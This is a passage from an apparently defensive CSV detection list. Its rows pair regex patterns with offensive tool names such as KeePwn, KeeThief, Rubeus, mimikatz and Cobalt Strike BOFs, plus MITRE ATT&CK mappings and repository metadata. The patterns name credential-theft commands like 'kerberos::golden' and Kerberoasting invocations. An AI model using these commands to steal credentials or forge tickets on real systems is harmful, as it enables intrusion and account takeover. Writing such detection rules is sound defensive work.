Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn plugin *",".{0,1000}KeePwn\splugin\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn plugin add -u * -p * -d * -t *",".{0,1000}KeePwn\splugin\sadd\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}\s\-t\s.{0,1000}","offensive_tool_keyword","exegol","Fully 
featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*KeePwn plugin check -u *",".{0,1000}KeePwn\splugin\scheck\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*KeePwn trigger *",".{0,1000}KeePwn\strigger\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn v* - by Julien BEDEL*",".{0,1000}KeePwn\sv.{0,1000}\s\-\sby\sJulien\sBEDEL.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.__main__:main*",".{0,1000}keepwn\.__main__\:main.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" 
"*keepwn.core.parse_dump*",".{0,1000}keepwn\.core\.parse_dump.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.core.plugin*",".{0,1000}keepwn\.core\.plugin.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.core.search*",".{0,1000}keepwn\.core\.search.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*keepwn.core.trigger*",".{0,1000}keepwn\.core\.trigger.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn.py *",".{0,1000}KeePwn\.py\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeePwn-main.zip*",".{0,1000}KeePwn\-main\.zip.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret 
extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*KeeTheft/Dinvoke*",".{0,1000}KeeTheft\/Dinvoke.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*KeeThief*",".{0,1000}KeeThief.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","895","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" "*KeeThief.*",".{0,1000}KeeThief\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeeThief.ps1*",".{0,1000}KeeThief\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeeThiefSyscalls*",".{0,1000}KeeThiefSyscalls.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*keethief-syscalls*",".{0,1000}keethief\-syscalls.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" 
"*KerbDump\*-Tickets-KerbDump.txt*",".{0,1000}KerbDump\\.{0,1000}\-Tickets\-KerbDump\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*kerberoast /*",".{0,1000}kerberoast\s\/.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*kerberoast /*",".{0,1000}kerberoast\s\/.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Kerberoast Attack - Services Configured With a Weak Password*",".{0,1000}Kerberoast\sAttack\s\-\sServices\sConfigured\sWith\sa\sWeak\sPassword.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - 
TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Kerberoast -username *",".{0,1000}Kerberoast\s\-username\s.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*Kerberoast(*",".{0,1000}Kerberoast\(.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*Kerberoast.*",".{0,1000}Kerberoast\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*kerberoast.py*",".{0,1000}kerberoast\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1352","314","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*Kerberoast.py*",".{0,1000}Kerberoast\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*kerberoast_attack*",".{0,1000}kerberoast_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerberoast_blind_output_*",".{0,1000}kerberoast_blind_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation 
Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerberoast_john_results_*",".{0,1000}kerberoast_john_results_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*kerberoastables.txt*",".{0,1000}kerberoastables\.txt.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*kerberoasting*",".{0,1000}kerberoasting.{0,1000}","offensive_tool_keyword","OSCP-Cheatsheets","kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.","T1558 - T1208 - T1003 - T1110","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md","1","1","N/A","N/A","1","89","34","2019-09-09T22:07:47Z","2019-09-12T22:07:31Z" "*kerberoasting.boo*",".{0,1000}kerberoasting\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*kerberoasting.x64*",".{0,1000}kerberoasting\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*KerberOPSEC.csproj*",".{0,1000}KerberOPSEC\.csproj.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*KerberOPSEC.exe*",".{0,1000}KerberOPSEC\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*KerberOPSEC-x64.exe*",".{0,1000}KerberOPSEC\-x64\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*KerberOPSEC-x86.exe*",".{0,1000}KerberOPSEC\-x86\.exe.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*Kerberos abuse (kerbeus BOF)*",".{0,1000}Kerberos\sabuse\s\(kerbeus\sBOF\).{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "*kerberos*.kirbi*",".{0,1000}kerberos.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","265","41","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*kerberos/decryptor.py*",".{0,1000}kerberos\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*kerberos::ask*",".{0,1000}kerberos\:\:ask.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::clist*",".{0,1000}kerberos\:\:clist.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::golden /service:*",".{0,1000}kerberos\:\:golden\s\/service\:.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*kerberos::golden*",".{0,1000}kerberos\:\:golden.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::golden*",".{0,1000}kerberos\:\:golden.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::hash*",".{0,1000}kerberos\:\:hash.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*kerberos::list*",".{0,1000}kerberos\:\:list.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" 
